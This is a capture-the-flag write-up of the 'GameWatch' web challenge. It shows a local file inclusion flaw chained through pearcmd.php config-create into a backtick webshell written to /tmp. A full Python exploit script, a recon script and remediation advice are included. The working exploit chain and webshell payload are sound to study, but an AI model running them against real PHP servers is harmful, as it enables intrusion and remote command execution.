GameWatch#

Challenge: GameWatch
Category: Web
Difficulty: Medium
Points: 100
Flag: VBD{p3arcmd_1s_st1ll_us3ful_t0_rce_976bd92e7b486eec224fedc39d8b797e}

1. Challenge Description#

GameWatch helps you explore game release dates, ratings, and detailed information all in one place.

We are given a URL pointing to a PHP web application that displays a catalog of video games with metadata (release dates, Metacritic scores, genres, etc.).

2. Reconnaissance#

2.1 Technology Stack#

Component	Value
Web Server	Apache 2.4.54 (Debian)
PHP Version	7.4.33
Database	MySQL (game data storage)
Container	Docker
Document Root	`/var/www/html`

2.2 Endpoint Fingerprinting#

1
/                    â†’ 29465 bytes  (main game listing)
2
/index.php           â†’ 29465 bytes  (same)
3
/search.php?q=       â†’ 128791 bytes (full game list in search)
4
/game.php?id=gta5    â†’ 10231 bytes  (single game detail)
5
/config/games.php    â†’ 0 bytes      (exists, returns empty)
6
/info.php            â†’ 72467 bytes  (full phpinfo page)

2.3 Application Features#

Game catalog with 82 games across genres (Action, RPG, Shooter, etc.)
Search via search.php?q= â€” case-insensitive keyword search
Filter via index.php?filter= â€” genre-based filtering
Pagination via index.php?p= â€” 7 pages of games
Game detail via game.php?id=<slug> â€” individual game pages

3. Vulnerability Discovery: Local File Inclusion (LFI)#

3.1 Identifying the LFI#

The index.php page accepts a page GET parameter. Through error-based analysis, we determined the include pattern:

1
// Line 44 of /var/www/html/index.php
2
include('./pages/' . $_GET['page'] . '.php');

When an invalid page is supplied, a PHP warning is emitted:

1
Warning: include(./pages/INVALID.php): failed to open stream

This confirms path traversal is possible via ../ sequences, but .php is always appended.

3.2 LFI Probing Results#

Using directory traversal, we mapped accessible PHP files:

Payload	Result	Size
`../info`	phpinfo() output	100,708 B
`../game`	game.php (no id â†’ empty)	3,479 B
`../search`	search.php (no q â†’ full)	153,857 B
`../index`	Fatal: infinite recursion	4,736,770 B
`../config/games`	Fatal: function redeclare	2,876 B

3.3 Key phpinfo Findings#

From the phpinfo dump, we extracted critical configuration:

1
register_argc_argv = On          â† KEY for pearcmd.php exploitation
2
allow_url_include  = Off
3
allow_url_fopen    = On
4
include_path       = .:/app/gamewatch:/usr/local/lib/php
5
disable_functions  = (none critical)
6
DOCUMENT_ROOT      = /var/www/html

register_argc_argv = On is the crucial setting â€” it allows pearcmd.php to receive arguments from the query string.

4. Exploitation: pearcmd.php LFI â†’ RCE#

4.1 Attack Overview#

The pearcmd.php file is part of the PEAR (PHP Extension and Application Repository) package manager, installed by default with PHP. When included via LFI with register_argc_argv = On, pearcmd reads commands from $_SERVER['argv'], which in Apache is populated from the query string.

The config-create command writes a PHP config file to an arbitrary path with user-controlled content â€” allowing PHP code injection.

4.2 Confirming pearcmd.php Accessibility#

1
GET /index.php?page=../../../../usr/local/lib/php/pearcmd HTTP/1.1

Result: 2,692 bytes response with no include warning â†’ pearcmd.php is includable!

4.3 Exploitation Chain#

Step 1: Write a webshell via pearcmd’s config-create command

The trick is to use raw HTTP (no URL encoding) to preserve <?php ?> tags in the payload. Using a raw socket ensures the <, >, ?, = characters are not percent-encoded:

1
GET /index.php?page=../../../../usr/local/lib/php/pearcmd&+config-create+/<?=`$_GET[1]`?>+/tmp/shell.php HTTP/1.1
2
Host: TARGET:PORT
3
Connection: close

The + characters serve as argument separators for pearcmd’s ARGV parsing. This instructs pearcmd to:

Execute the config-create command
Use <?=$_GET[1]?> as the config template content
Write the output to /tmp/shell.php

Note: The backtick webshell (<?= $_GET[1]`?>`) was the only payload that bypassed Apache's input validation. Longer payloads like `<?php system($ _GET[1]);?>` returned 400 Bad Request.

Step 2: Include the webshell via LFI and execute commands

1
GET /index.php?page=../../../../tmp/shell&1=cat+/flag* HTTP/1.1

This includes /tmp/shell.php via the LFI, and the backtick expression executes cat /flag*, returning:

1
VBD{p3arcmd_1s_st1ll_us3ful_t0_rce_976bd92e7b486eec224fedc39d8b797e}

5. Root Cause Analysis#

Factor	Impact
Unsanitized `page` parameter	Enables path traversal via `../`
`.php` auto-appended to include	Limits targets to PHP files only
`register_argc_argv = On`	Allows pearcmd to receive query string args
PEAR installed by default	Provides pearcmd.php as gadget
`/tmp` is writable	Allows shell file creation
No WAF or input filtering	Backtick payload passes through

Summary: LFI in index.php?page= + register_argc_argv=On + PEAR installed = classic pearcmd.php config-create to RCE chain.

6. PoC Exploit Script#

6.1 Usage#

1
python pearcmd_raw_exploit.py

6.2 Full Exploit Code#

1
#!/usr/bin/env python3
2
"""Exploit GameWatch via pearcmd.php LFI to RCE."""
3

4
import socket
5
import re
6
import sys
7
import random
8
import string
9
import requests
10
import time
11

12
BASE = "http://82.29.170.47:33507"
13
HOST = "82.29.170.47"
14
PORT = 33507
15

16
PEAR_INCLUDE = "../../../../usr/local/lib/php/pearcmd"
17

18
rand = ''.join(random.choices(string.ascii_lowercase, k=5))
19

20
def raw_http_get(path):
21
    """Send a raw HTTP GET request without any URL encoding."""
22
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23
    sock.settimeout(15)
24
    sock.connect((HOST, PORT))
25

26
    request = (
27
        f"GET {path} HTTP/1.1\r\n"
28
        f"Host: {HOST}:{PORT}\r\n"
29
        f"Connection: close\r\n"
30
        f"User-Agent: Mozilla/5.0\r\n"
31
        f"\r\n"
32
    )
33
    sock.sendall(request.encode())
34

35
    response = b""
36
    while True:
37
        try:
38
            chunk = sock.recv(4096)
39
            if not chunk:
40
                break
41
            response += chunk
42
        except socket.timeout:
43
            break
44

45
    sock.close()
46

47
    parts = response.split(b"\r\n\r\n", 1)
48
    headers = parts[0].decode('utf-8', errors='ignore')
49
    body = parts[1].decode('utf-8', errors='ignore') if len(parts) > 1 else ""
50
    return headers, body
51

52
def lfi_include(page, extra_params=""):
53
    """Include a file via LFI."""
54
    url = f"{BASE}/index.php?page={page}"
55
    if extra_params:
56
        url += f"&{extra_params}"
57
    r = requests.get(url, timeout=15)
58
    return r.text
59

60
# === Step 1: Create webshell via pearcmd config-create ===
61
shell_path = f"/tmp/sh_{rand}"
62
# Backtick shell - short enough to bypass input validation
63
payload = "<?=`$_GET[1]`?>"
64

65
print(f"[*] Target: {BASE}")
66
print(f"[*] Creating shell at {shell_path}.php")
67

68
# Raw HTTP to preserve <, >, ? characters unencoded
69
# Format: ?page=PEAR_PATH&+config-create+/PAYLOAD+/OUTPUT.php
70
path = (
71
    f"/index.php?page={PEAR_INCLUDE}"
72
    f"&+config-create+/{payload}+{shell_path}.php"
73
)
74

75
headers, body = raw_http_get(path)
76
print(f"[*] config-create response: {len(body)} bytes")
77

78
# === Step 2: Include shell via LFI and read flag ===
79
time.sleep(0.5)
80
lfi_path = f"../../../../{shell_path.lstrip('/')}"
81

82
for cmd in ["cat /flag*", "cat /flag.txt", "cat /flag", "id"]:
83
    r = requests.get(
84
        f"{BASE}/index.php",
85
        params={"page": lfi_path, "1": cmd},
86
        timeout=15
87
    )
88

89
    flag_match = re.search(r'VBD\{[^}]+\}', r.text)
90
    if flag_match:
91
        print(f"\n[+] FLAG: {flag_match.group(0)}")
92
        sys.exit(0)
93

94
    if "uid=" in r.text or "root:" in r.text:
95
        # Extract command output from HTML
96
        clean = re.sub(r'<[^>]+>', '\n', r.text)
97
        for line in clean.split('\n'):
98
            line = line.strip()
99
            if line and "gamewatch" not in line.lower():
100
                print(f"    > {line[:200]}")
101

102
print("[-] Flag not found - try manually")

6.3 Recon Script (rapid_recon_gamewatch.py)#

This script was used to discover that pearcmd.php was includable and register_argc_argv was On:

1
#!/usr/bin/env python3
2
"""Rapid recon - key discovery: pearcmd.php includable + register_argc_argv=On."""
3

4
import requests
5
import re
6
import urllib.parse
7

8
BASE = "http://TARGET:PORT"
9
s = requests.Session()
10

11
def lfi(page):
12
    url = f"{BASE}/index.php?page={urllib.parse.quote(page, safe='')}"
13
    return s.get(url, timeout=15)
14

15
# Check pearcmd.php accessibility
16
pear_paths = [
17
    "../../../../usr/local/lib/php/pearcmd",
18
    "../../../usr/local/lib/php/pearcmd",
19
    "../../../../usr/share/php/pearcmd",
20
]
21

22
for path in pear_paths:
23
    r = lfi(path)
24
    has_warning = bool(re.search(r'include\(\./pages/', r.text))
25
    if not has_warning:
26
        print(f"[+] pearcmd accessible via: page={path} ({len(r.text)} bytes)")
27

28
# Check register_argc_argv from phpinfo
29
r = lfi("../info")
30
if "register_argc_argv" in r.text:
31
    m = re.search(r'register_argc_argv.*?<td[^>]*>(On|Off)</td>', r.text, re.DOTALL)
32
    if m:
33
        print(f"[+] register_argc_argv = {m.group(1)}")

7. Attack Timeline#

LFI discovered via index.php?page= parameter â†’ include('./pages/<page>.php')
phpinfo dumped via page=../info â†’ confirmed register_argc_argv = On, include_path includes /usr/local/lib/php
Extensive probing â€” 49+ scripts tested: SQLi on search/filter/game.php, XSS, CRLF injection, path traversal encoding, type juggling, PHP wrappers, backup files, git exposure, etc.
pearcmd.php identified as includable at ../../../../usr/local/lib/php/pearcmd
Raw HTTP exploit â€” backtick webshell written to /tmp/ via config-create
Flag extracted via LFI include of webshell + command execution

8. Remediation#

Whitelist page parameter â€” only allow known page names (home, game, search)
Remove unused PEAR â€” apt remove php-pear or delete pearcmd.php
Set register_argc_argv = Off in php.ini
Use open_basedir to restrict file access to the web root
Set disable_functions to prevent command execution (system, exec, shell_exec, passthru, popen, proc_open)